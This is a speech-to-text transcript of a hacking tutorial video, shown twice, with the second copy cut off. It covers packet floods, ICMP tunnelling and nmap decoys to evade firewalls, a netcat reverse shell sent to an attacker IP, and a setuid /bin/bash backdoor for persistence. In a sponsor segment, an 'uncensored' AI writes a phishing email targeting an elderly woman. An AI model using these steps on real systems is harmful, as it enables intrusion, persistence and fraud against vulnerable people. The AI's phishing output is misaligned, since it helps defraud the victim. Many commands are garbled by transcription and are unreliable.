Top 60 Hacking Commands

Here are the top 60 hacking commands you need to know. I also brought in a few experts, so get your coffee ready if you want to try these commands right now. I've got a free Cali Lennic Sandbox and a description. Just click that link and right here in your browser, boom hacking environment. Make sure you read the instructions. You get two hosts to hack with. Also, all the commands in this video are in the description below. We even created this beautiful top hacking commands cheat sheet. You got to have this the humble ping command. We ping a host to see if it's up and if it's up we'll hack it. But right now we're sending a 64 byte packet. What do you say? We send something bigger to test firewall capabilities. We can type in dash S and specify the size of our packet, testing the capabilities of a firewall, or we can get even crazier. We'll still send our large packet dash S 1300, but then we'll use the switch dash F to absolutely obliterate this host flood. A ton of packets. And actually before we do that, I want to see this happen. I'll start another terminal and give you a bonus command here. This tool is called IF top. I'll install it with a PT install if and then type in if F top to run it. Now let's flood. Look at that. That's a lot of data control C to stop that. Same for if F top. Goodbye. And actually let's keep IF top up because we're not done with ping yet. I know you didn't realize there's so much to ping and this tool is kind of crazy. It's called H ping three. We'll install it with a PT install H ping three. And we can do fun things like flooding packets on a specific port. For example, port 83 s for a T CCP packet V for verbose mode gives us more flood to make it rain. And finally the host. Here we go man, look at that. And we're hitting port 80. Great for testing web servers. We can also use H ping three for a fancy trace three V and then here's what's cool. We'll do dash one four I CM P packets and then our host network chuck.coffee, but sometimes firewalls P with trace route removing dash one. We can instead do P 80 and S doing trace route on port 80, which is web traffic using of course CP and pick your port maybe 4, 4, 3, maybe 53. Use the DS port specifying UDP traffic or with TCP traffic we can add the dash a switch setting the act flag and then change our base port with dash dash base port 1, 3, 3, 7. All amazing options to help us evade firewall rules. Now I bet you thought we were done with ping, but we're not. You can tunnel TCP packets over ICMP echo reply and request packets. What? Check this out. It happens with the tool called P tunnel. A PT installed P tunnel. On the target side, we'll simply run P tunnel. On the attacker side we'll run P tunnel P for proxy address, it'll be our target dash LP. To specify our local port, we'll do 8,000 dash DA for our destination address. It'll also be our target and we'll do dash DP for our destination port. And because I'm going to try SSH, I'll do port 22 ready set tunnel. Now to watch this happen in real time, I'm going to show you a new command. CP dump will help us to capture and visualize these packets in real time. We'll use a PT install TCP dump to install it and then we'll run T CCP dump dash I for interface and we'll say any. And we're only looking for ICMP traffic, so we'll type in ICMP. Now watch this. I'll want you new terminal. Now I'm going to go over this tunnel using ICMP packets. Oh my gosh, check this out. SSH P report specifying 8,000 and I'll do username network. Chuck, that's my username at the other host at local host pointing it right here on this computer, this server. Ready, set, go. Do you see it happening? Oh my stinking, gosh. Literally sending SSA traffic over ICMP. Echo reply echo request. That's magic. Who am I IP address? Yep, I'm somewhere else. That's so cool. And control C to close those tunnels on both sides, this is great for evading firewalls that might block that type of traffic. Here's a quick command from Tom, nom, nom, nom nom. No, no. I'm Tom m nom and this is a trick I use all the time. If you're running a command and you don't know what you want to do with the output yet, pipe it to vim dash. That'll open the output of the command in Vim, and then you can either manually edit it or you can use column percent bang to run it back through any command you want. Run it through, sort to put things in order or grip dash V to remove lines you don't want. And then as a bonus, if you have a file name under your cursor at G, then F to open that file in a new buffer. Nmap will scan a network helping us to discover hosts that we can hack. Here's some fun ways to use it. First, make sure you install it A PT install Nmap. We can scan an entire network for quick mapping with Nmap dash, sn, and then our target network. Hey, it found 11, host the switch, lowercase s, capital V will do service discovery on a target works like a charm. Use the capital O switch for OS detection. Well hold up, we tried, but it's blocking ping probes. Let's try dash PN to not do the probe. We'll add that to our command dash capital P lowercase n bam. We got it's a Windows pc. We can use a lowercase s capital L switch to do quick host name scanning on a network. Nmap scripts, unlike a whole new world, we can scan for vulnerabilities on a host with script vol and then our target host or network, we can use the malware script to scan for known malware. With the capital A switch, we can scan for pretty much everything. Take a little coffee break, it'll take a while. This one switch does OS detection, version detection, some default script scanning from Nmap and the trace route. That's a lot of info. That's awesome. If we use the lowercase F switch, it'll fragment our packets and make it harder for us to be detected while we're scanning. We can also avoid detection by changing our source port. Using these source port switch, we can just say, Hey, I'm DNS, don't mind me. And if you really want to be tricky with Nmap, you can scan with decoys, check this out, Nmap dash capital D for decoys and then specify r and d all capital. Let's say 10. What that will do is generate 10 random IP addresses, random decoys that you're scanning from so they can't find you. We'll put our host in and then bam scanning from 10 different IP addresses. Now Inmap is cool, but what you have a lot to scan like networks upon networks and you want to scan them fast, that's where mass scan comes in. One install mass scan with a PT install mass scan. Mass scan is similar to Nmap and that we can specify ports to scan for specify a network, but then we can specify our rate and go super fast just like that. Or if we have no idea what networks we're dealing with, we can scan everything by the entire 10 point subnet range and we'll do a rate of 10,000. Now it is fast, but you still might want to take a coffee break just saying we'll just control see that. We could also use the randomized host switch to change the order in which we scan our host or networks helping us stay a bit more hidden or we can quickly find servers foolishly running telenet on a network. Super insecure, but we can find that out right now simply by specifying port 23 and scanning an entire network fast. Got one. Now here's John Hanman with something a bit silly but I love it though. You normally just enter LS on the command line to list stuff in the current directory. Well, did you know that there is actually an S SL command? Like if you were typing really fast or you accidentally made a mistake or you had a typo when you meant to type LS and you accidentally typed S sl, this is the steam locomotive and it is a train that is displayed on your computer screen, on the command line on the terminal. And look, you can't get out of this, you can't type anything, you can't do anything. You just have to wait for the whole train to drive by. Now the next fun hacking command that I want to show you is actually part of the dev piece of the file system. I don't know if you're familiar, but there is a slash dev slash udom file and that is like a device to list out PSEUDORANDOM data just coming from your computer, right? Hey, you have a stream, a constant stream of randomness and this looks hysterical. It is just gibberish nonsense zeros and ones and all the data up to 255 askie characters printable non-print. And it just looks like absolute chaos. You can control see out of this, but sometimes it might break the terminal and you can't actually continue to interact with the shell. So it's something that you might be able to do as a troll, as a meme, right? So what if we actually set an alias for that same LS command? Maybe we could set that to a cell if we wanted to run the steam locomotive train again, but we could set that to Cat deran and now anytime someone were to actually enter LS on the command line thinking that they're going to list files, it'll just spit up and go crazy with all that random gibberish nonsense. I think that's kind of fun. By the way, John Ham who will show us a real hacking command he loves later in the video, the who is command will tell you a ton of stuff about a domain, install it with a PT install, who is microsoft.com, fax number, phone number, address, let's try cia.gov redacted should have expected that. What web will tell you what technologies a website is using a PT install what web to install it and then we'll type in what web and our domain. We'll try network chuck.coffee. And while that's scanning perfect time for a coffee break, it gives you a ton of information including the fact that it's powered by Shopify right there. Next up, curl from Naham sec. My favorite command is actually not using any hacking tools and it's probably one of the most basic commands used on Linux and it comes by default on almost any operating system and that is a curl command. And lemme show you real quickly how I use it. The first thing I want to do is usually I just want to do a curl dash I that usually gives you the headers and every response in that header of what it is coming back from the server. So in this case it's giving us a 3 0 2 and it's saying, Hey, you are going to get redirected to this exact location. And I like doing curl a lot because I'm hacking a lot of APIs most of the time and with APIs I want to just quickly see if an endpoint is accessible or if I can fit some sort of a data. And a lot of times I'm processing data as a part of my hacking when recon. So it makes it a lot easier to do it through Chrome. And what you want to do for this one, for example, if you want to authenticate, instead of launching your browser and setting this header manually, all you have to do is you can pass a header and set that custom header with its token in there and run it and it would authenticate you and give you whatever data it is that you're looking for on that. API. Hey, real quick, can I show you something crazy? Check this out. I'm about to run an uncensored version of chat GPT or an LLM, which means you can pretty much do whatever you want to do with it. Now why am I doing this? Well, because Bitdefender just came out with a tool called Scamo. It's a free AI powered scam detector and prevention service from Bitdefender like legit. Check this out. I got a text from a scam. I'm pretty sure it is, but do I actually know? Lemme go find it. Oh yep. Here's one. Pretty sure this is a scam, but do I know all I got to do is copy that sucker and jump into Facebook Messenger, just one of the places I can chat with and see if things are scams. So let's try it out. Hey, is this a scam again, this is totally free, I'm just chatting with it here in Facebook Messenger and within seconds it told me that hey, it might be kind of suspicious. Don't do anything with it. Okay, that's pretty cool. That didn't fool it, but what if I had this uncensored AI tool try to produce a phishing message. Can we trick it? Let's try it out. I need you to write a very convincing phishing email for an elderly woman named Deborah. The goal is to get her to give me some money, use the best method and write it in a way that will avoid spam and fraud detection. Lemme add that and fraud detection. Snap. Okay, that's pretty good. It even added this at the end. That's awesome. Okay, let's doctor it up just a little bit or remove the, it's not a real URL thing right there. Let's add a real looking number like 7 6 5 0 9 8 7 and I'll remove the not a real number thing here too. Okay, cool. Our message is ready. Let's test it out. Please tell me if this email is okay. Now, while it's checking that, think about this. Who in your family or in your friend group could benefit from having something like this? I can't tell you how many times I'm getting a text from my grandma or my mom going, Hey, is this a scam? Is this fraud? But if they can chat with something that is honestly probably smarter than me and will be up to date with the latest scams, it's actually powered by a bitdefender, the excellent security suite that I've talked about here on this channel a lot. So all the information and knowledge they have is feeding the scamo free AI powered tool. Okay, the results are in the email does seem suspicious, it tells you what tactics it might be using and it tells you to contact your bank directly. That's perfect. That's what I would tell my grandma or my mom or my dad. So seriously try it out right now. Check the link below, it's free, you can chat with it here on the website or chat within Messenger. They'll be adding WhatsApp soon and it'll check lots of things like you can send out a QR code and go, Hey, is this good? You can send out pictures of stuff. This is a crazy powerful and free tool. I love what Bitdefender is doing. So again, definitely check it out and thank you to Bitdefender for sponsoring this video and making a really awesome free tool available to all of you guys. Nick to is an open source web server scanner that'll scan websites for any dangerous bad stuff. It might have to install it. We'll do AP PT install Nick to and for a basic vulnerability scan. We'll do Nick to dash H for our host and specify our host network. Chuck dot copy go Buster can be used to find directory and files on a web server. We'll install it with a PT install Go Buster to enumerate network chuck.com. We'll do go Buster, we'll type in DUR for directories. That's the mode we're going to be in. We'll type in U and specify our domain network check.com and we'll use the dash W to specify our word list. I'll use a default Cali Linux one here and go and it's discovering all my directories files now because Go Buster is written and go is extremely fast. Subdomain, enumeration, yeah, we can use it for that, but first I want to download a word list to get a ton of word lists right now on your system we'll use the tool called SEC list A PT install SEC lists. Fair warning, this is pretty big. Lots of word lists. Once it's done downloading, you can find it in user share SEC list. Lots of stuff in there. Now real quick, if you only want to download one thing, the thing that we care about, there's a command for that. It's called W Get Cyclist is also on GitHub and it's maintained by my friends. What we care about is discovery and DNS and we'll get Jason Haddock's list here. I'm going to grab the raw URL to install W get a PT install W Get Kind Seeing a pattern here, right? Type in W get paste at URLW. Got it. Now getting back to Go Buster, we can enumerate domains. We'll type in go Buster mod BDNS. We'll specify our domain with dash D network check.com and then our word list with dash W. I'll use Jason Haddock's DNS. Ready, set, go. Now that's a pretty big list and if I were doing a legit pin test, I'd probably let this finish out but I don't have time for that. I'm not patient enough Control C to stop that. I want to show you another way to do subdomain enumeration. This tool is called sub lister. You can install it with a PT, install sub lister just like this and the E is a three. And then to run sub lister, we'll simply type in sub lister dash D to specify our domain network check.com and let it go. And it found a lot of stuff. This next one is pretty fun. It's called WP Scan. It will scan WordPress sites and help you find all the issues that might be affecting it. Great. If you're a WordPress site owner and great, you're a pen tester, let's try it out. We can run it in a few ways. The first way WP scan, we'll do dash dash URL and specify our URL. We'll do chuck keith.com, my personal website that's not doing anything. And then we'll do dash enumerates you, not you the letter you the U stands for users, let's try it out. That's a lot of information. We can also use the P option for plugins. We can use T for themes or do something pretty aggressive. We'll do VP VT dash plugins, dash detection and we'll add aggressive at the end just to make sure we get our point across. This is a super aggressive vulnerability scan. Let's try it out. Now you may have noticed that all those commands did not output anything fun because you need an API token from WP scan, which you can get for free right now. And then you would run the commands like this specifying your API token with a dash API dash token switch. A mass is another tool you can use for subdomain. Enumeration. Install it with a PT install and to run it we'll type in a mass, type in enu dash adidas specifier domain network chuck.com and let it go. This tool might run forever. Alright, I don't want to wait for it though. Control C to stop that. But man, look at all the stuff about to do a more passive enumeration. You can do this a mass and we'll specify a dash passive and then our domain, whereas the other one was a bit more active. I like AMA because it does give us options based on what our scope is and we'll go ahead and stop that. This next command opens up the door to new commands. What does that mean? You'll see it's a tool called gi, which we'll often use when you first start out to interact with GitHub. Let me show you. There's a tool we're about to use called Search point, but the way we use this tool is by downloading it from GitHub and actually I lied, this is a GitLab repository, but it's pretty much the same thing. You'll use GI all the time to install all kinds of stuff, but first we have to install GI A PT Install Get you probably already have it. And then probably my favorite command is GI Clone. We're going to clone a tool onto our computer and in our case it will be search point. Let's go to properly use that command, we'll add a symbolic link. We're not going to talk about that, just know it's a command below. And then finally we can use the command search exploit, right? Yeah, it's going to work. Let's try searching for WordPress plugins. It'll search for exploits that involve WordPress plugins. What about SSH? A ton of exploits pertaining to SSH Super handy tool if you want to update the database search exploit dash u crazy powerful tool. Now here's John Hammond with a real hacking command. It's kind of awesome. Let. Me get into the real genuine ethical hacking and penetration testing. My favorite top hacking command. Here's the thing, when you're on the command line interacting with the shell, you're actually running this program called Bash or the born again shell. Now that lives on the file system and slash bin bash. So if I were to actually execute this, it doesn't look like it does anything, I just get the prompt back because I've just invoked and I'm running a shell or terminal inside my shell so I could exit out of that and get back to my original prompt. But Ben Bash actually takes a special argument called TAC P and that will enforce and maintain set UID permissions, which means that the owner of the file root, in this case the admin absolute controller of the computer will be able to keep their permissions but it has to be a set UID binary. So the way that we could do that is to actually change mod or CH modifications, change modifications on the file and add or plus the S letter for set UID. We'll put that on Bin Bash and this will require some root privileges. That means that you need to be the admin to be able to configure this. But what that ultimately does is create a back door or you have a persistence mechanism, a little bit of a foothold so that at any point if we configure this with our pseudo password later on down the line, you get access to this machine one more time. Now you can just run bash tack P and you are root, you control the whole machine because you are the admin user. You set up that back door. If you wanted to, you could move into the root directory and you could do anything that you want. Maybe we could echo hello into a please subscribe to network Chuck, I'll hit enter on that. And now if I zoom out, let me show you this. LS Tech LA we can see our file right there. Please subscribe to network Chuck. Hey, just owned and controlled by the root user and we were able to configure that with our back door. Pseudo CH mod plus S bin Bash. That is my favorite top hacking command because then you've got a backdoor, you've got a persistence mechanism and a way to become root at any point. I hope you enjoyed a couple of those. Really neat Hey top hacking commands. But thank you so much network Chuck for letting me join the party here. This was an absolute blast. Now I'm going to do something bad. I'm going to do the same command twice. What? No, I know. It's okay. We're going to talk about TCP dump again. Why? Well because there's more cool stuff about it and we didn't give it enough time. We'll type in TCP dump, we'll type in dash W to send it to a file. We'll just call it capture dot pcap. Then dash I for our interface and we'll do ethernet zero. That's the one I have now lemme just make sure that's the case. IP address, yes, ethernet zero and go. And we'll generate some traffic, do something fun that we've already learned and map with random addresses. Decoys. We'll stop that with CTRL C. We can analyze that traffic with this command. TCP dump dash r specify our capture file which just capture pcap. Let's take a look. Cool. We can see we can also limit the amount of packets we capture with TCP dump and the switch dash C for counts. And we'll say like 100 that did not long. Now TCP dump is pretty cool. Great for quick captures but the real tool you want to use that's crazy powerful is thar the command line brother of Wireshark. To install thar we'll do a PT install thar thar can do a lot. Let's try a few things. First we'll type in thar and we'll capture one packet, just one. We'll put it in verbose mode with dash capital V, we'll do dash C for count. We'll do one and then dash IE, the 9 0 1 packet captured. And then look at all the stuff it shows us. That is so powerful. Networking geeks are just drooling. So yes, I'm drooling. Do you want to see something crazier filters. Watch this T-shirt. We'll do a dash y to apply a display filter and with this single quote we'll specify we'll do http request method space equals equals and a double quotes get and then close it out with a single quote. I know it's kind of wordy but check this out. Let's specify our interface get at zero and we're now capturing only showing get request. How cool is that? Let's generate some curl academy.network chuck.com. There's another one that's so cool. Now one of the most powerful ways we can use thar is by analyzing packet captures. So let's do a capture real quick to a file thar and actually no, I'm going to show you one cool thing. We'll use a command called timeout and put in 15 seconds and it'll time out or stop this packet capture in 15 seconds. That's pretty cool. Thar dash I ethernet zero and with a dash w command similar to TCP dump. We'll send that to a file thar dash p app me. Try to generate some quick traffic and done to display statistics and specifically to follow endpoint connections. Use this command thar dash r, we'll specify our capture, which was thar pcap. Then we'll use the switches dash qz and specify endpoints ip. How cool is that? We could also follow A TCP stream with thar dash RR capture dash qz and we'll say follow comma TCP. And we'll put that in ask E. So ask E, we'll do comma, we'll follow the seventh stream. That's pretty cool. Let's try, I dunno, the first stream. First stream's crazy. Let's do the 20th stream, the hundred stream. So powerful. We can also simply do custom output of fields based on the capture we're reviewing. Check this out thar do a dash e IP source dash e IP desk or DST dash e framed protocols. Notice we're specifying fields. We'll do a dash T fields, which is telling it to only output the fields we're specifying. And then finally dash r specifying our capture. How cool is that? So powerful. This is my new favorite tool. Tux a terminal multiplexer install tux with APT install tux. And then simply type in tm. We suddenly have a new terminal that we can do stuff in like ping academy.network chuck.com, leave that there. Hit control B and then D on your keyboard, you're detached from it. And then with tux A get right back to it. How powerful is that? I'll stop type in exit to close that out. We can create multiple sessions and name them. So team UX, new dash S and name it Bob, here's Bob. We'll ping something here. Detach from that for another session, Susie. Now if I type in tux ls, I've got two sessions and I can reattach to either of them, team ux, a dash t to specify my target will say Susie jumping right back in there. I can hit control B and then W to quickly jump between my various team Uck sessions and I can leave, go to another computer, jump back in here and connect to any one of these sessions. If you want to learn more, I did a whole video on team UX right up here. SSH. We use it all the time to remote into our systems. So for example, this Ubuntu guy to jump into him, I'll use SSH Ss H network Chuck at his IP address already. Cool. But it can do more. Instead of logging in, I can actually just run a command via SS H on another system with SSH network. Chuck at my server. And then right after that specify the command I want to run. So in single quotes I can say, who am I? BAM or IP address. Crazy powerful. Let's get crazier. You can actually make it a SOX proxy. What? Watch this. Before I create the tunnel, lemme demonstrate my location right now what's my IP address? I'm in Dallas, Texas as you can see right here. But if I use this crazy SSH command, I'll create a proxy and tunnel myself somewhere else. SSH dash D, which is telling it to create a SOX proxy. And I'll say port 1, 3, 3, 7. We'll do a dash C for compression dash Q for quiet mode and dash N to not execute any commands. And finally our server information root at, and this will be a server in Japan. Put our password in. Now we're going to launch chromium using that proxy. Our SOX five, the local host. Ready, set, go. Chromium's launched. Now I'll see where we are already feel a bit different and giving them, having a hard time figuring out where to go. I'm definitely in Osaka, Japan. Super cool, right Netcat our go-to for reverse shells. To install netcat, we'll do a PT install netcat dash traditional. To verify, just type in NC dash H and with Netcat installed on both your attacking computer and your target computer. Let's do a reverse shell on the attacker. All we got to do is wait, wait for the shell type in NC dash LVP and the port. You're waiting on 1 3, 3 7. We're waiting because on a reverse shell, the target reaches out to us On the target side, we'll type in NC for netcat, we'll do a dash e and specify the shell we want to have access to. So we'll do slash ben slash sh specify our attacker ip, which is us and the port 1, 3, 3, 7 that the attacker is listening on and they one hit enter if something happened. It sure stinking did check it out. I'm on the other computer. I've got a reverse shell. They can also do a fun thing where you just set a simple chat server with net cap. Why? I don't know. But you can do it. You should try it. It's fun. On one side you type in NC dash LVP, set up port on the other side, type in NC dash V, the IP address of the other computer and the port. So now I can say hey and I get hey, on the other side, what are you thinking about the end of this video? Me too. I'll catch you guys next time. For real though.

Here are the top 60 hacking
commands you need to know. I also brought in a few experts, so get your coffee ready if you want
to try these commands right now. I&#39;ve got a free Cali Lennic
Sandbox and a description. Just click that link and right here in
your browser, boom hacking environment. Make sure you read the instructions.
You get two hosts to hack with. Also, all the commands in this video
are in the description below. We even created this beautiful
top hacking commands cheat sheet. You got to have this
the humble ping command. We ping a host to see if it&#39;s
up and if it&#39;s up we&#39;ll hack it. But right now we&#39;re sending a
64 byte packet. What do you say? We send something bigger to
test firewall capabilities. We can type in dash S and
specify the size of our packet, testing the capabilities of a
firewall, or we can get even crazier. We&#39;ll still send our
large packet dash S 1300, but then we&#39;ll use the switch dash F to
absolutely obliterate this host flood. A ton of packets. And actually before
we do that, I want to see this happen. I&#39;ll start another terminal and
give you a bonus command here. This tool is called IF top. I&#39;ll install it with a PT install if
and then type in if F top to run it. Now let&#39;s flood. Look at that. That&#39;s a lot of data control C to
stop that. Same for if F top. Goodbye. And actually let&#39;s keep IF top up
because we&#39;re not done with ping yet. I know you didn&#39;t realize there&#39;s so
much to ping and this tool is kind of crazy. It&#39;s called H ping three. We&#39;ll install it with a
PT install H ping three. And we can do fun things like flooding
packets on a specific port. For example, port 83 s for a T CCP packet V for verbose mode gives us more flood
to make it rain. And finally the host. Here we go man, look at that.
And we&#39;re hitting port 80. Great for testing web servers. We can also use H ping three
for a fancy trace three V and then here&#39;s what&#39;s cool. We&#39;ll do dash one four I CM P packets
and then our host network chuck.coffee, but sometimes firewalls P with
trace route removing dash one. We can instead do P 80 and
S doing trace route on port 80, which is web traffic using of
course CP and pick your port maybe 4, 4, 3, maybe 53. Use the DS port specifying UDP
traffic or with TCP traffic we can add the dash a switch setting
the act flag and then change our base port with dash dash base port 1, 3, 3, 7. All amazing options to help
us evade firewall rules. Now I bet you thought we were
done with ping, but we&#39;re not. You can tunnel TCP packets over
ICMP echo reply and request packets. What? Check this out. It happens
with the tool called P tunnel. A PT installed P tunnel. On the target
side, we&#39;ll simply run P tunnel. On the attacker side we&#39;ll run
P tunnel P for proxy address, it&#39;ll be our target dash LP.
To specify our local port, we&#39;ll do 8,000 dash DA for
our destination address. It&#39;ll also be our target and we&#39;ll
do dash DP for our destination port. And because I&#39;m going to try SSH,
I&#39;ll do port 22 ready set tunnel. Now to watch this happen in real time,
I&#39;m going to show you a new command. CP dump will help us to capture and
visualize these packets in real time. We&#39;ll use a PT install TCP dump to
install it and then we&#39;ll run T CCP dump dash I for interface and we&#39;ll say any.
And we&#39;re only looking for ICMP traffic, so we&#39;ll type in ICMP. Now watch
this. I&#39;ll want you new terminal. Now I&#39;m going to go over this tunnel
using ICMP packets. Oh my gosh, check this out. SSH P report specifying 8,000
and I&#39;ll do username network. Chuck, that&#39;s my username at the other host
at local host pointing it right here on this computer, this server. Ready,
set, go. Do you see it happening? Oh my stinking, gosh. Literally
sending SSA traffic over ICMP. Echo reply echo request. That&#39;s
magic. Who am I IP address? Yep, I&#39;m somewhere else. That&#39;s so cool. And control C to close
those tunnels on both sides, this is great for evading firewalls
that might block that type of traffic. Here&#39;s a quick command from
Tom, nom, nom, nom nom. No, no. I&#39;m Tom m nom and this is
a trick I use all the time. If you&#39;re running a command and you
don&#39;t know what you want to do with the output yet, pipe it to vim dash. That&#39;ll
open the output of the command in Vim, and then you can either manually edit
it or you can use column percent bang to run it back through any command
you want. Run it through, sort to put things in order or grip
dash V to remove lines you don&#39;t want. And then as a bonus, if you have a
file name under your cursor at G, then F to open that file in a new buffer. Nmap will scan a network helping us
to discover hosts that we can hack. Here&#39;s some fun ways to use it. First, make sure you install
it A PT install Nmap. We can scan an entire network for
quick mapping with Nmap dash, sn, and then our target network. Hey, it
found 11, host the switch, lowercase s, capital V will do service discovery
on a target works like a charm. Use the capital O switch for OS
detection. Well hold up, we tried, but it&#39;s blocking ping probes. Let&#39;s
try dash PN to not do the probe. We&#39;ll add that to our command
dash capital P lowercase n bam. We got it&#39;s a Windows pc. We can use a lowercase s capital L switch
to do quick host name scanning on a network. Nmap scripts,
unlike a whole new world, we can scan for vulnerabilities on a
host with script vol and then our target host or network, we can use the malware
script to scan for known malware. With the capital A switch, we can
scan for pretty much everything. Take a little coffee
break, it&#39;ll take a while. This one switch does OS
detection, version detection, some default script scanning
from Nmap and the trace route. That&#39;s a lot of info. That&#39;s awesome.
If we use the lowercase F switch, it&#39;ll fragment our packets and make it
harder for us to be detected while we&#39;re scanning. We can also avoid detection
by changing our source port. Using these source port switch, we can
just say, Hey, I&#39;m DNS, don&#39;t mind me. And if you really want to be tricky
with Nmap, you can scan with decoys, check this out, Nmap dash capital D for decoys
and then specify r and d all capital. Let&#39;s say 10. What that will
do is generate 10 random IP addresses, random decoys that you&#39;re scanning
from so they can&#39;t find you. We&#39;ll put our host in and then bam
scanning from 10 different IP addresses. Now Inmap is cool, but what you have a lot
to scan like networks upon
networks and you want to scan them fast, that&#39;s where
mass scan comes in. One install mass scan with
a PT install mass scan. Mass scan is similar to Nmap and that we
can specify ports to scan for specify a network, but then we can specify our
rate and go super fast just like that. Or if we have no idea
what networks we&#39;re dealing with, we can scan everything by the entire 10
point subnet range and we&#39;ll do a rate of 10,000. Now it is fast, but you still might want to
take a coffee break just saying we&#39;ll just control see that. We could also use the randomized host
switch to change the order in which we scan our host or networks helping us
stay a bit more hidden or we can quickly find servers foolishly running
telenet on a network. Super insecure, but we can find that out right now simply
by specifying port 23 and scanning an entire network fast. Got one. Now here&#39;s John Hanman with something
a bit silly but I love it though. You normally just enter LS on the
command line to list stuff in the current directory. Well, did you know that
there is actually an S SL command? Like if you were typing really fast or
you accidentally made a mistake or you had a typo when you meant to type
LS and you accidentally typed S sl, this is the steam locomotive
and it is a train that is displayed on your computer screen,
on the command line on the terminal. And look, you can&#39;t get out of
this, you can&#39;t type anything, you can&#39;t do anything. You just have to
wait for the whole train to drive by. Now the next fun hacking command that I
want to show you is actually part of the dev piece of the file system. I
don&#39;t know if you&#39;re familiar, but there is a slash dev
slash udom file and that is like a device to list out PSEUDORANDOM
data just coming from your computer, right? Hey, you have a stream, a constant stream of randomness
and this looks hysterical. It is just gibberish nonsense
zeros and ones and all the data up to 255 askie
characters printable non-print. And it just looks like absolute chaos.
You can control see out of this, but sometimes it might break the terminal
and you can&#39;t actually continue to interact with the shell. So it&#39;s something that you might be
able to do as a troll, as a meme, right? So what if we actually set an
alias for that same LS command? Maybe we could set that to a cell if we
wanted to run the steam locomotive train again, but we could set that to
Cat deran and now anytime someone were to actually enter LS on
the command line thinking that they&#39;re going to list files, it&#39;ll just spit up and go crazy with
all that random gibberish nonsense. I think that&#39;s kind of fun. By the way, John Ham who will show us a real hacking
command he loves later in the video, the who is command will tell you
a ton of stuff about a domain, install it with a PT install,
who is microsoft.com, fax number, phone number, address, let&#39;s try cia.gov redacted
should have expected that. What web will tell you what technologies
a website is using a PT install what web to install it and then we&#39;ll
type in what web and our domain. We&#39;ll try network chuck.coffee. And while that&#39;s scanning
perfect time for a coffee break, it gives you a ton of information
including the fact that it&#39;s powered by Shopify right there. Next
up, curl from Naham sec. My favorite command is actually not
using any hacking tools and it&#39;s probably one of the most basic commands used on
Linux and it comes by default on almost any operating system and
that is a curl command. And lemme show you real
quickly how I use it. The first thing I want to do is usually
I just want to do a curl dash I that usually gives you the headers and every
response in that header of what it is coming back from the server. So in this case it&#39;s giving us
a 3 0 2 and it&#39;s saying, Hey, you are going to get redirected
to this exact location. And I like doing curl a lot because I&#39;m
hacking a lot of APIs most of the time and with APIs I want to just quickly
see if an endpoint is accessible or if I can fit some sort of a data. And a lot of times I&#39;m processing data
as a part of my hacking when recon. So it makes it a lot easier
to do it through Chrome. And what you want to do for this one,
for example, if you want to authenticate, instead of launching your browser
and setting this header manually, all you have to do is you can pass a
header and set that custom header with its token in there and run it and it would
authenticate you and give you whatever data it is that you&#39;re
looking for on that. API. Hey, real quick, can I show you
something crazy? Check this out. I&#39;m about to run an uncensored
version of chat GPT or an LLM, which means you can pretty much do
whatever you want to do with it. Now why am I doing this? Well, because Bitdefender just came
out with a tool called Scamo. It&#39;s a free AI powered scam detector
and prevention service from Bitdefender like legit. Check this out. I got a
text from a scam. I&#39;m pretty sure it is, but do I actually know? Lemme
go find it. Oh yep. Here&#39;s one. Pretty sure this is a scam, but do I know all I got to do is copy
that sucker and jump into Facebook Messenger, just one of the places I can
chat with and see if things are scams. So let&#39;s try it out. Hey, is this
a scam again, this is totally free, I&#39;m just chatting with it here in Facebook
Messenger and within seconds it told me that hey, it might be
kind of suspicious. Don&#39;t
do anything with it. Okay, that&#39;s pretty cool. That didn&#39;t fool it, but what if I had this uncensored AI
tool try to produce a phishing message. Can we trick it? Let&#39;s try it out. I need you to write a very convincing
phishing email for an elderly woman named Deborah. The goal is to get
her to give me some money, use the best method and write it in
a way that will avoid spam and fraud detection. Lemme add that and fraud
detection. Snap. Okay, that&#39;s pretty good. It even added this at the
end. That&#39;s awesome. Okay, let&#39;s doctor it up just a
little bit or remove the, it&#39;s not a real URL thing right there. Let&#39;s add a real looking
number like 7 6 5 0 9 8 7 and I&#39;ll remove the not a real
number thing here too. Okay, cool. Our message is ready. Let&#39;s test it out.
Please tell me if this email is okay. Now, while it&#39;s checking
that, think about this. Who in your family or in your friend
group could benefit from having something like this? I can&#39;t tell you how many times I&#39;m
getting a text from my grandma or my mom going, Hey, is this a scam? Is this fraud? But if they can chat with something that
is honestly probably smarter than me and will be up to date
with the latest scams, it&#39;s actually powered by a bitdefender, the excellent security suite that I&#39;ve
talked about here on this channel a lot. So all the information and knowledge
they have is feeding the scamo free AI powered tool. Okay, the results are
in the email does seem suspicious, it tells you what tactics it might be
using and it tells you to contact your bank directly. That&#39;s perfect. That&#39;s what I would tell my
grandma or my mom or my dad. So seriously try it out right now.
Check the link below, it&#39;s free, you can chat with it here on the
website or chat within Messenger. They&#39;ll be adding WhatsApp soon and it&#39;ll
check lots of things like you can send out a QR code and go, Hey, is this good?
You can send out pictures of stuff. This is a crazy powerful and free
tool. I love what Bitdefender is doing. So again, definitely check it out and thank you
to Bitdefender for sponsoring this video and making a really awesome free
tool available to all of you guys. Nick to is an open source web server
scanner that&#39;ll scan websites for any dangerous bad stuff. It
might have to install it. We&#39;ll do AP PT install Nick to and
for a basic vulnerability scan. We&#39;ll do Nick to dash H for our
host and specify our host network. Chuck dot copy go Buster can be used
to find directory and files on a web server. We&#39;ll install it with a PT install Go
Buster to enumerate network chuck.com. We&#39;ll do go Buster, we&#39;ll
type in DUR for directories. That&#39;s the mode we&#39;re going to be in. We&#39;ll type in U and specify our domain
network check.com and we&#39;ll use the dash W to specify our word list. I&#39;ll use a default Cali Linux one here
and go and it&#39;s discovering all my directories files now because Go Buster
is written and go is extremely fast. Subdomain, enumeration,
yeah, we can use it for that, but first I want to download a word list
to get a ton of word lists right now on your system we&#39;ll use the tool
called SEC list A PT install SEC lists. Fair warning, this is
pretty big. Lots of word lists. Once it&#39;s done downloading, you can find it in user share SEC list. Lots of stuff in there. Now real quick,
if you only want to download one thing, the thing that we care about,
there&#39;s a command for that. It&#39;s called W Get Cyclist is also on
GitHub and it&#39;s maintained by my friends. What we care about is discovery and DNS
and we&#39;ll get Jason Haddock&#39;s list here. I&#39;m going to grab the raw URL to
install W get a PT install W Get Kind Seeing a pattern here, right? Type in W get paste at URLW. Got
it. Now getting back to Go Buster, we can enumerate domains. We&#39;ll
type in go Buster mod BDNS. We&#39;ll specify our domain with dash D
network check.com and then our word list with dash W. I&#39;ll use Jason
Haddock&#39;s DNS. Ready, set, go. Now that&#39;s a pretty big list and
